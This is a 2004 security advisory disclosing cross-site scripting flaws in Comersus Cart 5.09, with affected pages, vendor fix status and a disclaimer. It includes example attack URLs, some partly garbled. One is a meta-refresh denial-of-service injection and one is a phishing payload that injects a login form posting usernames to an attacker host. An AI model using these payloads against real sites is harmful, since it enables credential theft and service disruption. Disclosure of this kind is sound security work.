Comersus Cart Cross-Site Scripting Vulnerability Release Date: July 6, 2004 Severity: High Vendor: Comersus Open Technologies Software: Tested on Comersus Cart 5.09 Previous versions may also be affected. Remote: Remotely executed from any web browser Technical Details: The malicious user is able to compromise the parameters to invoke a Cross-Site Scripting attack. This can be used to take advantage of the trust between a client and server allowing the malicious user to execute malicious JavaScript on the client's machine or perform a denial of service shutting down IIS. Pages Affected: /comersus/store/comersus_customerAuthenticateForm.asp /comersus/backofficeLite/comersus_backoffice_message.asp /comersus/store/comersus_supportError.asp /comersus/store/comersus_message.asp Examples: Denial of Service: http://[VICTIM]/comersus/store/comersus_message.asp?message=< meta%20http-equ iv='refresh'content='0'> Phishing: http://[VICTIM]/comersus/store/comersus_message.asp?message=orm%20action=" Usernam">http://www.evilhacker.com/save2db.asp"%20method="post">Usernam e:
XSS: http://[VICTIM]/comersus/backofficeLite/comersus_backoffice_messa ge.asp?mess age= Vendor Status: Upgrade to 5.098 http://www.comersus.com/ Credit: Discovered By: Thomas Ryan Provide Security Original Advisory http://www.providesecurity.com/research/advisories/07062004-01.asp Copyright (c) 2004 Provide Security Permission is hereby granted for the redistribution of this alert Disclaimer The information within this paper may change without notice. Use of this information constitutes acceptance for use in an AS IS condition. There are no warranties, implied or express, with regard to this information. In no event shall the author be liable for any direct or indirect damages whatsoever arising out of or in connection with the use or spread of this information. Any use of this information is at the user's own risk.